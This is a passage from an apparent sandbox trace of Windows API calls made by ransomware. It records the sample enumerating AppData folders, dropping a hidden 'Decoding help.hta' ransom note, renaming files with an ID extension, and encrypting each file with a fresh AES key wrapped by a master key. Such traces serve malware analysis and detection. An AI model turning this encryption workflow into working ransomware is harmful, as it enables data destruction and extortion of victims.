HALPmcxz\\AppData\\Local\\Application Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*.*" [0042.628] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0042.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115012c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6cc [0042.631] CloseHandle (hObject=0x6cc) returned 1 [0042.631] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps", cAlternateFileName="")) returned 1 [0042.631] lstrcmpW (lpString1=".", lpString2="Apps") returned -1 [0042.631] lstrcmpW (lpString1="..", lpString2="Apps") returned -1 [0042.631] lstrcmpiW (lpString1="windows", lpString2="Apps") returned 1 [0042.634] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0042.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0042.634] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Apps" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps" [0042.634] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*" [0042.634] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0042.634] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11519328, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6cc [0042.640] CloseHandle (hObject=0x6cc) returned 1 [0042.640] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0042.640] lstrcmpW (lpString1=".", lpString2="Deployment") returned -1 [0042.640] lstrcmpW (lpString1="..", lpString2="Deployment") returned -1 [0042.641] lstrcmpiW (lpString1="windows", lpString2="Deployment") returned 1 [0042.641] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0042.641] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0042.641] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Deployment" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment" [0042.641] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*.*" [0042.641] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0042.648] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c9e868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6cc [0042.657] CloseHandle (hObject=0x6cc) returned 1 [0042.657] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1 [0042.657] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0042.657] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0042.657] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Decoding help.hta" [0042.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\decoding help.hta")) returned 0xffffffff [0042.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0042.657] WriteFile (in: hFile=0x6cc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc08fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc08fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.658] CloseHandle (hObject=0x6cc) returned 1 [0042.659] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.659] lstrcmpiW (lpString1="Decoding help.hta", lpString2="GDIPFONTCACHEV1.DAT") returned -1 [0042.659] lstrlenW (lpString="GDIPFONTCACHEV1.DAT") returned 19 [0042.659] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0042.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0042.659] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="GDIPFONTCACHEV1.DAT" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" [0042.659] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" [0042.659] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.[ID]g9uZrLhJaygpwRm1[ID]" [0042.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0042.660] CreateFileMappingA (hFile=0x6cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6d8 [0042.660] CryptAcquireContextA (in: phProv=0xc08fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc08fcec*=0x3448f18) returned 1 [0046.399] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0xc08fce8 | out: phKey=0xc08fce8*=0x6713f0) returned 1 [0046.399] CryptExportKey (in: hKey=0x6713f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc08fbe4, pdwDataLen=0xc08fce4 | out: pbData=0xc08fbe4*, pdwDataLen=0xc08fce4*=0x2c) returned 1 [0046.399] MapViewOfFile (hFileMappingObject=0x6d8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a900) returned 0x2f90000 [0046.452] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc08fbe4*, pdwDataLen=0xc08fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc08fbe4*, pdwDataLen=0xc08fcf8*=0x100) returned 1 [0046.452] CryptEncrypt (in: hKey=0x6713f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f90000, pdwDataLen=0xc08fce4*=0x1a900, dwBufLen=0x1a900 | out: pbData=0x2f90000*, pdwDataLen=0xc08fce4*=0x1a900) returned 1 [0046.588] UnmapViewOfFile (lpBaseAddress=0x2f90000) returned 1 [0046.590] CloseHandle (hObject=0x6d8) returned 1 [0046.590] CryptDestroyKey (hKey=0x6713f0) returned 1 [0046.590] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0046.590] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.590] WriteFile (in: hFile=0x6cc, lpBuffer=0xc08fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xc08fcf8, lpOverlapped=0x0 | out: lpBuffer=0xc08fbe4*, lpNumberOfBytesWritten=0xc08fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.591] WriteFile (in: hFile=0x6cc, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xc08fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xc08fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.591] CloseHandle (hObject=0x6cc) returned 1 [0046.593] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.593] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0046.593] lstrcmpW (lpString1=".", lpString2="Google") returned -1 [0046.593] lstrcmpW (lpString1="..", lpString2="Google") returned -1 [0046.593] lstrcmpiW (lpString1="windows", lpString2="Google") returned 1 [0046.593] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0046.593] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0046.593] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Google" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google" [0046.593] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*" [0046.593] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0046.593] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93d0388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6cc [0046.657] CloseHandle (hObject=0x6cc) returned 1 [0046.657] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0046.657] lstrcmpW (lpString1=".", lpString2="History") returned -1 [0046.657] lstrcmpW (lpString1="..", lpString2="History") returned -1 [0046.657] lstrcmpiW (lpString1="windows", lpString2="History") returned 1 [0046.658] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0046.658] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0046.658] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="History" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History" [0046.658] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*.*" [0046.658] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0046.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97aa438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6cc [0046.681] CloseHandle (hObject=0x6cc) returned 1 [0046.682] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b9fc540, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x126775, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0046.682] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0046.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0046.682] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Decoding help.hta" [0046.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\decoding help.hta")) returned 0x1 [0046.682] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IconCache.db") returned -1 [0046.682] lstrlenW (lpString="IconCache.db") returned 12 [0046.682] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0046.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0046.682] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" [0046.682] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" [0046.682] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]" [0046.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0046.683] CreateFileMappingA (hFile=0x6cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0046.683] CryptAcquireContextA (in: phProv=0xc08fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc08fcec*=0x3448d80) returned 1 [0046.684] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0xc08fce8 | out: phKey=0xc08fce8*=0x6713f0) returned 1 [0046.684] CryptExportKey (in: hKey=0x6713f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc08fbe4, pdwDataLen=0xc08fce4 | out: pbData=0xc08fbe4*, pdwDataLen=0xc08fce4*=0x2c) returned 1 [0046.684] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xe490000 [0046.686] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc08fbe4*, pdwDataLen=0xc08fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc08fbe4*, pdwDataLen=0xc08fcf8*=0x100) returned 1 [0046.687] CryptEncrypt (in: hKey=0x6713f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xe490000, pdwDataLen=0xc08fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xe490000*, pdwDataLen=0xc08fce4*=0x100000) returned 1 [0048.154] UnmapViewOfFile (lpBaseAddress=0xe490000) returned 1 [0048.339] CloseHandle (hObject=0x66c) returned 1 [0048.339] CryptDestroyKey (hKey=0x6713f0) returned 1 [0048.339] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0048.339] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.339] WriteFile (in: hFile=0x6cc, lpBuffer=0xc08fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xc08fcf8, lpOverlapped=0x0 | out: lpBuffer=0xc08fbe4*, lpNumberOfBytesWritten=0xc08fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.380] WriteFile (in: hFile=0x6cc, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xc08fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xc08fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.380] CloseHandle (hObject=0x6cc) returned 1 [0051.403] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.273] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0055.273] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0055.273] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0055.273] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0055.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0055.274] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0055.274] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft" [0055.274] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*" [0055.274] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0055.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9641e20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x824 [0055.754] 